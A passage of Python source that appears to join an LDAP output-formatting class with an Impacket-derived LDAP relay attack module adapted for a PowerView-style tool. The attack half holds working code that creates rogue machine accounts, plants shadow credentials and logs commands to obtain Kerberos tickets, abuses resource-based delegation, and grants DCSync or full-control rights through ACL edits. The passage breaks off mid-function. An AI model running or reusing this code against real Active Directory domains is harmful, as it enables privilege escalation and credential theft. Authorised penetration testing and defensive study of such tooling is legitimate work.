            logging.warning("Failed sort to with unknown error")
            return entries

    def alter_entries(self,entries,cond):
        temp_alter_entries = []
        try:
            left,right = re.split(' con | cont | conta | contai | contain | contains | eq | equ | equa | equal | match | mat | matc | not | != |!=| = |=C|=D', cond, flags=re.IGNORECASE)
            operator = re.search(' con | cont | conta | contai | contain | contains | eq | equ | equa | equal | match | mat | matc | not | != |!=| = |=C|=D', cond, re.IGNORECASE).group(0)
            left = left.strip("'").strip('"').strip()
            operator = operator.strip("'").strip('"').strip()
            right = right.strip("'").strip('"').strip()
        except:
            logging.error('Where argument format error. (e.g. "samaccountname contains admin")')
            return
        if (operator in "contains") or (operator in "match"):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if str(right).casefold() in str(temp_entry['attributes'][left]).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        return None
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() in str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)

        elif (operator in "equal") or (operator == "="):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if str(right).casefold() == str(temp_entry['attributes'][left]).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        pass
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() == str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)
        elif (operator.lower() == "not") or (operator.lower() == "!="):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if not (len(str(''.join(temp_entry['attributes'][left])).casefold()) == 0) and (str(right).casefold() == "null"):
                            temp_alter_entries.append(entry)
                        elif str(''.join(temp_entry['attributes'][left])).casefold() != str(right).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        pass
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() != str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)
        else:
            logging.error(f'Invalid operator')

        return temp_alter_entries

    def resolve_values(self,entry):
        # resolve msDS-SupportedEncryptionTypes
        #try:
        #    if "msDS-SupportedEncryptionTypes" in list(entry["attributes"].keys()):
        #        if isinstance(entry['attributes']['msDS-SupportedEncryptionTypes'], list):
        #            entry["attributes"]["msDS-SupportedEncryptionTypes"] = ENCRYPTION_TYPE.parse_value(entry["attributes"]["msDS-SupportedEncryptionTypes"][0])
        #        else:
        #            entry["attributes"]["msDS-SupportedEncryptionTypes"] = ENCRYPTION_TYPE.parse_value(entry["attributes"]["msDS-SupportedEncryptionTypes"])
        #except:
        #    pass

        #        # resolve userAccountControl
        #        try:
        #            if "userAccountControl" in list(entry["attributes"].keys()):
        #                if isinstance(entry['attributes']['userAccountcontrol'], list):
        #                    entry["attributes"]["userAccountControl"] = UAC.parse_value(entry['attributes']['userAccountControl'][0])
        #                else:
        #                    entry["attributes"]["userAccountControl"] = UAC.parse_value(entry["attributes"]["userAccountControl"])
        #        except:
        #            pass

        return entry

    def get_max_len(self, lst):
        # Cache the result based on list content hash
        cache_key = hash(tuple(sorted(lst)))
        if cache_key in self._format_cache:
            return self._format_cache[cache_key]
        
        result = len(max(lst, key=len)) + self.config['padding']
        self._format_cache[cache_key] = result
        return result

    def clean_value(self, value):
        temp = []
        for i in range(len(value)):
            if isinstance(value[i], list):
                temp += value[i]
            else:
                temp.append(value[i])
        
        return temp

    def beautify(self, strs, lens):
        if isinstance(strs, str) and not self.args.nowrap:
            temp = ""
            if len(strs) > self.config['wrap_length']:
                index = self.config['wrap_length']
                for i in range(0, len(strs), self.config['wrap_length']):
                    temp += f"{str(strs[i:index])}\n"
                    temp += ''.ljust(lens)
                    index += self.config['wrap_length']
            else:
                temp = f"{str(strs).ljust(lens)}"

            return temp.strip()
        elif isinstance(strs, list) and not self.args.nowrap:
            for i in range(len(strs)):
                if isinstance(strs[i], datetime.datetime):
                    strs[i] = strs[i].strftime(self.config['date_format'])
                elif isinstance(strs[i], bytes):
                    strs[i] = self.format_binary_data(strs[i])
                    temp = ""
                    if len(strs[i]) > self.config['wrap_length']:
                        index = self.config['wrap_length']
                        for j in range(0, len(strs[i]), self.config['wrap_length']):
                            temp += f"{str(strs[i][j:index])}\n"
                            temp += ''.ljust(lens)
                            index += self.config['wrap_length']
                    else:
                        temp = f"{str(strs[i]).ljust(lens)}"

                    strs[i] = temp.strip()
            return strs
        elif isinstance(strs, bytes):
            strs = self.format_binary_data(strs)
            return strs
        else:
            return str(strs)

    def format_value_by_type(self, value):
        """Format a value based on its data type."""
        if isinstance(value, datetime.datetime):
            return value.strftime(self.config['date_format'])
        elif isinstance(value, bytes):
            return self.format_binary_data(value)
        elif isinstance(value, list):
            return self.format_list_value(value)
        elif isinstance(value, int):
            return str(value)
        else:
            return str(value)
            
    def format_binary_data(self, data):
        """Format binary data according to configuration."""
        if self.config['binary_format'] == 'base64':
            return base64.b64encode(data).decode('utf-8')
        elif self.config['binary_format'] == 'hex':
            return data.hex()
        else:
            return base64.b64encode(data).decode('utf-8')
            
    def format_list_value(self, value_list):
        """Format a list of values consistently."""
        if not value_list:
            return ""
            
        # Limit list size if needed
        if len(value_list) > self.config['max_list_items']:
            value_list = value_list[:self.config['max_list_items']]
            was_truncated = True
        else:
            was_truncated = False
            
        # Format each element
        formatted_items = []
        for item in value_list:
            if isinstance(item, datetime.datetime):
                formatted_items.append(item.strftime(self.config['date_format']))
            elif isinstance(item, bytes):
                formatted_items.append(self.format_binary_data(item))
            elif isinstance(item, dict) and "encoded" in item:
                formatted_items.append(str(item["encoded"]))
            else:
                formatted_items.append(str(item))
                
        # Join items
        result = "\n".join(formatted_items)
        
        # Add truncation indicator if needed
        if was_truncated:
            result += f"\n... (truncated, {len(value_list)} of {len(value_list)} items shown)"
            
        return result

    @staticmethod
    def format_pool_stats(stats):
        """Format connection pool statistics in a readable format."""
        import time
        
        print(f"\n{bcolors.BOLD}{bcolors.OKBLUE}Connection Pool Statistics{bcolors.ENDC}")
        print("=" * 50)
        
        # Check if we have the new enhanced format or old format
        if 'summary' in stats and 'pools' in stats:
            # New enhanced format with LDAP and SMB pools
            summary = stats['summary']
            pools = stats['pools']
            
            # Overall statistics
            print(f"{bcolors.BOLD}Pool Overview:{bcolors.ENDC}")
            print(f"  Total Connections: {bcolors.OKGREEN}{summary['total_connections']}{bcolors.ENDC}")
            print(f"  Maximum Allowed:   {bcolors.WARNING}{summary['total_max_connections']}{bcolors.ENDC}")
            print(f"  Failed Attempts:   {bcolors.FAIL if summary['total_failed_attempts'] > 0 else bcolors.OKGREEN}{summary['total_failed_attempts']}{bcolors.ENDC}")
            
            if summary['total_max_connections'] > 0:
                utilization = (summary['total_connections'] / summary['total_max_connections']) * 100
                utilization_color = bcolors.OKGREEN if utilization < 70 else bcolors.WARNING if utilization < 90 else bcolors.FAIL
                print(f"  Pool Utilization:  {utilization_color}{utilization:.1f}%{bcolors.ENDC}")
            
            print(f"  LDAP Domains:      {bcolors.OKCYAN}{summary['ldap_domains']}{bcolors.ENDC}")
            print(f"  SMB Hosts:         {bcolors.OKCYAN}{summary['smb_hosts']}{bcolors.ENDC}")
            
            # LDAP Pool Details
            if 'ldap' in pools and pools['ldap'].get('total_connections', 0) > 0:
                ldap_pool = pools['ldap']
                print(f"\n{bcolors.BOLD}{bcolors.OKBLUE}LDAP Connection Pool:{bcolors.ENDC}")
                print("-" * 50)
                print(f"  Connections: {bcolors.OKGREEN}{ldap_pool['total_connections']}{bcolors.ENDC}/{bcolors.WARNING}{ldap_pool['max_connections']}{bcolors.ENDC}")
                print(f"  Utilization: {bcolors.OKGREEN}{summary['pool_utilization']['ldap']:.1f}%{bcolors.ENDC}")
                print(f"  Failed Attempts: {bcolors.FAIL if ldap_pool['failed_attempts'] > 0 else bcolors.OKGREEN}{ldap_pool['failed_attempts']}{bcolors.ENDC}")
                
                # Domain-specific statistics
                if ldap_pool.get('domains'):
                    print(f"\n  {bcolors.BOLD}Domain Connections:{bcolors.ENDC}")
                    for domain, domain_stats in ldap_pool['domains'].items():
                        FORMATTER._format_connection_details(domain, domain_stats, "Domain")
            
            # SMB Pool Details
            if 'smb' in pools and pools['smb'].get('total_connections', 0) > 0:
                smb_pool = pools['smb']
                print(f"\n{bcolors.BOLD}{bcolors.OKBLUE}SMB Connection Pool:{bcolors.ENDC}")
                print("-" * 50)
                print(f"  Connections: {bcolors.OKGREEN}{smb_pool['total_connections']}{bcolors.ENDC}/{bcolors.WARNING}{smb_pool['max_connections']}{bcolors.ENDC}")
                print(f"  Utilization: {bcolors.OKGREEN}{summary['pool_utilization']['smb']:.1f}%{bcolors.ENDC}")
                print(f"  Failed Attempts: {bcolors.FAIL if smb_pool['failed_attempts'] > 0 else bcolors.OKGREEN}{smb_pool['failed_attempts']}{bcolors.ENDC}")
                
                # Host-specific statistics
                if smb_pool.get('hosts'):
                    print(f"\n  {bcolors.BOLD}Host Connections:{bcolors.ENDC}")
                    for host, host_stats in smb_pool['hosts'].items():
                        FORMATTER._format_connection_details(host, host_stats, "Host")
            
            # Pool Health Summary
            print(f"\n{bcolors.BOLD}Pool Health Summary:{bcolors.ENDC}")
            print("-" * 50)
            
            # LDAP health
            if 'ldap' in pools and pools['ldap'].get('domains'):
                ldap_healthy = sum(1 for d in pools['ldap']['domains'].values() if d.get('is_alive', False))
                ldap_total = len(pools['ldap']['domains'])
                ldap_health = (ldap_healthy / ldap_total * 100) if ldap_total > 0 else 0
                health_color = bcolors.OKGREEN if ldap_health == 100 else bcolors.WARNING if ldap_health >= 50 else bcolors.FAIL
                print(f"  LDAP Health: {health_color}{ldap_health:.1f}%{bcolors.ENDC} ({ldap_healthy}/{ldap_total} domains)")
            
            # SMB health
            if 'smb' in pools and pools['smb'].get('hosts'):
                smb_healthy = sum(1 for h in pools['smb']['hosts'].values() if h.get('is_alive', False))
                smb_total = len(pools['smb']['hosts'])
                smb_health = (smb_healthy / smb_total * 100) if smb_total > 0 else 0
                health_color = bcolors.OKGREEN if smb_health == 100 else bcolors.WARNING if smb_health >= 50 else bcolors.FAIL
                print(f"  SMB Health:  {health_color}{smb_health:.1f}%{bcolors.ENDC} ({smb_healthy}/{smb_total} hosts)")
                
        else:
            # Legacy format compatibility
            print(f"{bcolors.BOLD}Pool Overview:{bcolors.ENDC}")
            print(f"  Total Connections: {bcolors.OKGREEN}{stats.get('total_connections', 0)}{bcolors.ENDC}")
            print(f"  Maximum Allowed:   {bcolors.WARNING}{stats.get('max_connections', 0)}{bcolors.ENDC}")
            print(f"  Failed Attempts:   {bcolors.FAIL if stats.get('failed_attempts', 0) > 0 else bcolors.OKGREEN}{stats.get('failed_attempts', 0)}{bcolors.ENDC}")
            
            if stats.get('max_connections', 0) > 0:
                utilization = (stats.get('total_connections', 0) / stats['max_connections']) * 100
                utilization_color = bcolors.OKGREEN if utilization < 70 else bcolors.WARNING if utilization < 90 else bcolors.FAIL
                print(f"  Pool Utilization:  {utilization_color}{utilization:.1f}%{bcolors.ENDC}")
            
            # Domain-specific statistics for legacy format
            if stats.get('domains'):
                print(f"\n{bcolors.BOLD}Domain Connections:{bcolors.ENDC}")
                print("-" * 50)
                for domain, domain_stats in stats['domains'].items():
                    FORMATTER._format_connection_details(domain, domain_stats, "Domain")
        
        print("\n" + "=" * 50)
        print()

    @staticmethod
    def _format_connection_details(name, stats, connection_type):
        """Format individual connection details (domain or host)."""
        import time
        
        # Format timestamps
        last_used_time = datetime.datetime.fromtimestamp(stats['last_used'])
        last_used_str = last_used_time.strftime('%Y-%m-%d %H:%M:%S')
        
        # Calculate time since last use
        time_since_use = time.time() - stats['last_used']
        if time_since_use < 60:
            time_since_str = f"{time_since_use:.1f} seconds ago"
        elif time_since_use < 3600:
            time_since_str = f"{time_since_use/60:.1f} minutes ago"
        else:
            time_since_str = f"{time_since_use/3600:.1f} hours ago"
        
        # Format connection age
        age_seconds = stats['age']
        if age_seconds < 60:
            age_str = f"{age_seconds:.1f} seconds"
        elif age_seconds < 3600:
            age_str = f"{age_seconds/60:.1f} minutes"
        else:
            age_str = f"{age_seconds/3600:.1f} hours"
        
        # Connection status color
        status_color = bcolors.OKGREEN if stats['is_alive'] else bcolors.FAIL
        status_text = "ALIVE" if stats['is_alive'] else "DEAD"
        
        print(f"\n    {bcolors.BOLD}{bcolors.OKCYAN}{connection_type}:{bcolors.ENDC} {name.upper()}")
        print(f"      Status:     {status_color}{status_text}{bcolors.ENDC}")
        print(f"      Use Count:  {stats['use_count']}")
        print(f"      Age:        {age_str}")
        print(f"      Last Used:  {last_used_str} ({time_since_str})")



# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   LDAP Attack Class
#   LDAP(s) protocol relay attack
#
# Authors:
#   Alberto Solino (@agsolino)
#   Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
#
import _thread
import random
import string
import json
import datetime
import binascii
import codecs
from enum import Enum
import re
import ldap3
import ldapdomaindump
from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
from ldap3.protocol.microsoft import security_descriptor_control
from ldap3.protocol.formatters.formatters import format_sid
from ldap3.utils.conv import escape_filter_chars
import os
from Cryptodome.Hash import MD4
import logging

from impacket import LOG
from impacket.examples.ldap_shell import LdapShell
from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
from impacket.ldap import ldaptypes
from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, ACCESS_ALLOWED_ACE, ACE, OBJECTTYPE_GUID_MAP
from impacket.uuid import string_to_bin, bin_to_string
from impacket.structure import Structure, hexdump

from dsinternals.system.Guid import Guid
from dsinternals.common.cryptography.X509Certificate2 import X509Certificate2
from dsinternals.system.DateTime import DateTime
from dsinternals.common.data.hello.KeyCredential import KeyCredential

from powerview.utils.constants import WELL_KNOWN_SIDS, EXTENDED_RIGHTS_NAME_MAP, EXTENDED_RIGHTS_MAP, SCHEMA_OBJECTS

# This is new from ldap3 v2.5
try:
    from ldap3.protocol.microsoft import security_descriptor_control
except ImportError:
    # We use a print statement because the logger is not initialized yet here
    print("Failed to import required functions from ldap3. ntlmrelayx requires ldap3 >= 2.5.0. \
Please update with 'python -m pip install ldap3 --upgrade'")
PROTOCOL_ATTACK_CLASS = "LDAPAttack"

# Define global variables to prevent dumping the domain twice
# and to prevent privilege escalating more than once
dumpedDomain = False
dumpedAdcs = False
alreadyEscalated = False
alreadyAddedComputer = False
delegatePerformed = []

#gMSA structure
class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    structure = (
        ('Version','<H'),
        ('Reserved','<H'),
        ('Length','<L'),
        ('CurrentPasswordOffset','<H'),
        ('PreviousPasswordOffset','<H'),
        ('QueryPasswordIntervalOffset','<H'),
        ('UnchangedPasswordIntervalOffset','<H'),
        ('CurrentPassword',':'),
        ('PreviousPassword',':'),
        #('AlignmentPadding',':'),
        ('QueryPasswordInterval',':'),
        ('UnchangedPasswordInterval',':'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self, data):
        Structure.fromString(self,data)

        if self['PreviousPasswordOffset'] == 0:
            endData = self['QueryPasswordIntervalOffset']
        else:
            endData = self['PreviousPasswordOffset']

        self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
        if self['PreviousPasswordOffset'] != 0:
            self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]

        self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
        self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]

class LDAPAttack(ProtocolAttack):
    """
    This is the default LDAP attack. It checks the privileges of the relayed account
    and performs a domaindump if the user does not have administrative privileges.
    If the user is an Enterprise or Domain admin, a new user is added to escalate to DA.
    """
    PLUGIN_NAMES = ["LDAP", "LDAPS"]

    # ACL constants
    # When reading, these constants are actually represented by
    # the following for Active Directory specific Access Masks
    # Reference: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2
    GENERIC_READ            = 0x00020094
    GENERIC_WRITE           = 0x00020028
    GENERIC_EXECUTE         = 0x00020004
    GENERIC_ALL             = 0x000F01FF

    def __init__(self, config, LDAPClient, username, root_dn, args=None):
        if args:
            self.principalidentity_dn = args.principalidentity_dn
            self.principalidentity_sid = format_sid(args.principalidentity_sid)
            self.targetidentity_dn = args.targetidentity_dn
            #self.targetidentity_sid = format_sid(args.targetidentity_sid)
            self.args = args

        self.rootDN = root_dn
        self.computerName = '' if not config.addcomputer else config.addcomputer[0]
        self.computerPassword = '' if not config.addcomputer or len(config.addcomputer) < 2 else config.addcomputer[1]
        ProtocolAttack.__init__(self, config, LDAPClient, username)
        if self.config.interactive:
            # Launch locally listening interactive shell.
            self.tcp_shell = TcpShell()

    def addComputer(self, parent, domainDumper):
        """
        Add a new computer. Parent is preferably CN=computers,DC=Domain,DC=local, but can
        also be an OU or other container where we have write privileges
        """
        global alreadyAddedComputer
        if alreadyAddedComputer:
            LOG.error('New computer already added. Refusing to add another')
            return False

        if not self.client.tls_started and not self.client.server.ssl:
            LOG.info('Adding a machine account to the domain requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS')
            if not self.client.start_tls():
                LOG.error('StartTLS failed')
                return False

        # Get the domain we are in
        domaindn = domainDumper.root
        domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]

        computerName = self.computerName
        if not computerName:
            # Random computername
            newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
        else:
            newComputer = computerName if computerName.endswith('$') else computerName + '$'

        computerPassword = self.computerPassword
        if not computerPassword:
            # Random password
            newPassword = ''.join(random.choice(string.ascii_letters + string.digits + '.,;:!$-_+/*(){}#@<>^') for _ in range(15))
        else:
            newPassword = computerPassword

        computerHostname = newComputer[:-1]
        newComputerDn = ('CN=%s,%s' % (computerHostname, parent)).encode('utf-8')

        # Default computer SPNs
        spns = [
            'HOST/%s' % computerHostname,
            'HOST/%s.%s' % (computerHostname, domain),
            'RestrictedKrbHost/%s' % computerHostname,
            'RestrictedKrbHost/%s.%s' % (computerHostname, domain),
        ]
        ucd = {
            'dnsHostName': '%s.%s' % (computerHostname, domain),
            'userAccountControl': 4096,
            'servicePrincipalName': spns,
            'sAMAccountName': newComputer,
            'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le')
        }
        LOG.debug('New computer info %s', ucd)
        LOG.info('Attempting to create computer in: %s', parent)
        res = self.client.add(newComputerDn.decode('utf-8'), ['top','person','organizationalPerson','user','computer'], ucd)
        if not res:
            # Adding computers requires LDAPS
            if self.client.result['result'] == RESULT_UNWILLING_TO_PERFORM and not self.client.server.ssl:
                LOG.error('Failed to add a new computer. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing account.')
            else:
                LOG.error('Failed to add a new computer: %s' % str(self.client.result))
            return False
        else:
            LOG.info('Adding new computer with username: %s and password: %s result: OK' % (newComputer, newPassword))
            alreadyAddedComputer = True
            # Return the SAM name
            return newComputer

    def addUserToGroup(self, userDn, domainDumper, groupDn):
        global alreadyEscalated
        # For display only
        groupName = groupDn.split(',')[0][3:]
        userName = userDn.split(',')[0][3:]
        # Now add the user as a member to this group
        res = self.client.modify(groupDn, {
            'member': [(ldap3.MODIFY_ADD, [userDn])]})
        if res:
            LOG.info('Adding user: %s to group %s result: OK' % (userName, groupName))
            LOG.info('Privilege escalation succesful, shutting down...')
            alreadyEscalated = True
            _thread.interrupt_main()
        else:
            LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result)))


    def shadowCredentialsAttack(self, ShadowCredentialsExportType="PFX"):
        LOG.info("Searching for the target account")

        # Get the domain we are in
        domaindn = self.rootDN
        domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]

        # Get target computer DN
        self.client.search(self.rootDN, f'(distinguishedName={self.targetidentity_dn})', attributes=['objectSid','sAMAccountName'])
        result = self.client.entries
        #result = self.getUserInfo(self.targetidentity_dn)
        if len(result) == 0:
            LOG.error('Target account does not exist! (wrong domain?)')
            return
        else:
            target_dn = result[0].entry_dn
            target_sid = result[0]['objectSid'].values[0]
            LOG.info("Target user found: %s" % target_dn)

        LOG.info("Generating certificate")
        certificate = X509Certificate2(subject=target_sid, keySize=2048, notBefore=(-40 * 365), notAfter=(40 * 365))
        LOG.info("Certificate generated")
        LOG.info("Generating KeyCredential")
        keyCredential = KeyCredential.fromX509Certificate2(certificate=certificate, deviceId=Guid(), owner=target_dn, currentTime=DateTime())
        LOG.info("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
        LOG.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())
        self.client.search(target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
        results = None
        for entry in self.client.response:
            if entry['type'] != 'searchResEntry':
                continue
            results = entry
        if not results:
            LOG.error('Could not query target user properties')
            return
        try:
            new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [keyCredential.toDNWithBinary().toString()]
            LOG.info("Updating the msDS-KeyCredentialLink attribute of %s" % self.targetidentity_dn)
            self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
            if self.client.result['result'] == 0:
                LOG.info("Updated the msDS-KeyCredentialLink attribute of the target object")
                path = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8))
                LOG.debug("No outfile path was provided. The certificate(s) will be store with the filename: %s" % path)
                if ShadowCredentialsExportType == "PEM":
                    certificate.ExportPEM(path_to_files=path)
                    LOG.info("Saved PEM certificate at path: %s" % path + "_cert.pem")
                    LOG.info("Saved PEM private key at path: %s" % path + "_priv.pem")
                    LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
                    LOG.info("Run the following command to obtain a TGT")
                    LOG.info("python3 PKINITtools/gettgtpkinit.py -cert-pem %s_cert.pem -key-pem %s_priv.pem %s/%s %s.ccache" % (path, path, domain, self.targetidentity_dn, path))
                elif ShadowCredentialsExportType == "PFX":
                    password = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20))
                    LOG.debug("The certificate will be store with the password: %s" % password)
                    certificate.ExportPFX(password=password, path_to_file=path)
                    LOG.info("Saved PFX (#PKCS12) certificate & key at path: %s" % path + ".pfx")
                    LOG.info("Must be used with password: %s" % password)
                    LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
                    LOG.info("Run the following command to obtain a TGT")
                    LOG.info("python3 PKINITtools/gettgtpkinit.py -cert-pfx %s.pfx -pfx-pass %s %s/%s %s.ccache" % (path, password, domain, self.targetidentity_dn, path))
            else:
                if self.client.result['result'] == 50:
                    LOG.error('Could not modify object, the server reports insufficient rights: %s' % self.client.result['message'])
                elif self.client.result['result'] == 19:
                    LOG.error('Could not modify object, the server reports a constrained violation: %s' % self.client.result['message'])
                else:
                    LOG.error('The server returned an error: %s' % self.client.result['message'])
        except IndexError:
            LOG.info('Attribute msDS-KeyCredentialLink does not exist')
        return

    def delegateAttack(self):
        self.client.search(self.targetidentity_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName','objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])
        target_entries = self.client.entries
        targetuser = None
        for entry in self.client.response:
            if entry['type'] != 'searchResEntry':
                continue
            targetuser = entry
        if not targetuser:
            LOG.error('Could not query target user properties')
            return
        try:
            sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])
            LOG.debug('Currently allowed sids:')
            for ace in sd['Dacl'].aces:
                LOG.debug('    %s' % ace['Ace']['Sid'].formatCanonical())
        except IndexError:
            # Create DACL manually
            sd = create_empty_sd()
        sd['Dacl'].aces.append(create_allow_ace(self.principalidentity_sid))
        self.client.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity':[ldap3.MODIFY_REPLACE, [sd.getData()]]})
        if self.client.result['result'] == 0:
            LOG.info('Delegation rights modified succesfully!')
            LOG.info('%s can now impersonate users on %s via S4U2Proxy', self.principalidentity_dn, target_entries[0]['sAMAccountName'].values[0])
            return True
        else:
            if self.client.result['result'] == 50:
                LOG.error('Could not modify object, the server reports insufficient rights: %s', self.client.result['message'])
            elif self.client.result['result'] == 19:
                LOG.error('Could not modify object, the server reports a constrained violation: %s', self.client.result['message'])
            else:
                LOG.error('The server returned an error: %s', self.client.result['message'])
            return False

    def dacl_remove_ace(self,secdesc, guid, usersid, accesstype):
        to_remove = None
        binguid = string_to_bin(guid)
        for ace in secdesc['Dacl'].aces:
            sid = ace['Ace']['Sid'].formatCanonical()
            # Is it the correct ACE type?
            if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE:
                continue
            # Is it the correct SID?
            if sid != usersid:
                continue
            # Does it apply to the correct property?
            if ace['Ace']['ObjectType'] != binguid:
                continue
            # Does it have the correct mask?
            if ace['Ace']['Mask']['Mask'] != accesstype:
                continue
            # We are still here -> this is the correct ACE
            to_remove = ace
            break

        if to_remove:
            # Found! Remove
            secdesc['Dacl'].aces.remove(to_remove)
            return True
        else:
            # Not found
            return False

    def aclAttack(self):
        rights = {
                'dcsync':[EXTENDED_RIGHTS_NAME_MAP['DS-Replication-Get-Changes'], EXTENDED_RIGHTS_NAME_MAP['DS-Replication-Get-Changes-All']],
                #'all':[EXTENDED_RIGHTS_NAME_MAP['DS-Replication-Get-Changes'],EXTENDED_RIGHTS_NAME_MAP['DS-Replication-Get-Changes-All'], EXTENDED_RIGHTS_NAME_MAP['User-Force-Change-Password'], EXTENDED_RIGHTS_NAME_MAP['Self-Membership']],
                'all':[SIMPLE_PERMISSIONS.FullControl.value],
                'resetpassword':[EXTENDED_RIGHTS_NAME_MAP['User-Force-Change-Password']],
                'writemembers':[EXTENDED_RIGHTS_NAME_MAP['Self-Membership']]
            }

        # Query for the sid of our user
        try:
            self.client.search(self.principalidentity_dn, '(objectClass=user)', attributes=['sAMAccountName', 'objectSid'])
            entry = self.client.entries[0]
        except IndexError:
            LOG.error('Could not retrieve infos for user: %s' % self.principalidentity_dn)
            return
        username = entry['sAMAccountName'].value
        usersid = entry['objectSid'].value
        LOG.debug('Found sid for user %s: %s' % (username, usersid))

        # Set SD flags to only query for DACL
        controls = security_descriptor_control(sdflags=0x04)
        alreadyEscalated = True

        #LOG.info('Querying domain security descriptor')
        self.client.search(self.rootDN, f'(distinguishedName={self.targetidentity_dn})', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)

        #if len(self.client.entries) == 0:
        #    LOG.error(f'{self.args.targetidentity} not found in domain. Ensure to use valid object distinguishedName property')
        #    return
        
        entry = self.client.entries[0]
        secDescData = entry['nTSecurityDescriptor'].raw_values[0]
        secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)

        if not self.args.delete:
            aceflags = 0x00
            if hasattr(self.args, "inheritance") and self.args.inheritance:
                LOG.debug('Inheritance is set. Adding CONTAINER_INHERIT_ACE, OBJECT_INFERIT_ACE')
                aceflags = ACE.CONTAINER_INHERIT_ACE + ACE.OBJECT_INHERIT_ACE
        
            if self.args.rights.lower() in list(rights.keys()):
                if self.args.rights.lower() == "all":
                    secDesc['Dacl']['Data'].append(create_ace(SIMPLE_PERMISSIONS.FullControl.value, usersid, aceflags))
                else:
                    for guid in rights[self.args.rights.lower()]:
                        secDesc['Dacl']['Data'].append(create_object_ace(guid, usersid, aceflags))
            else:
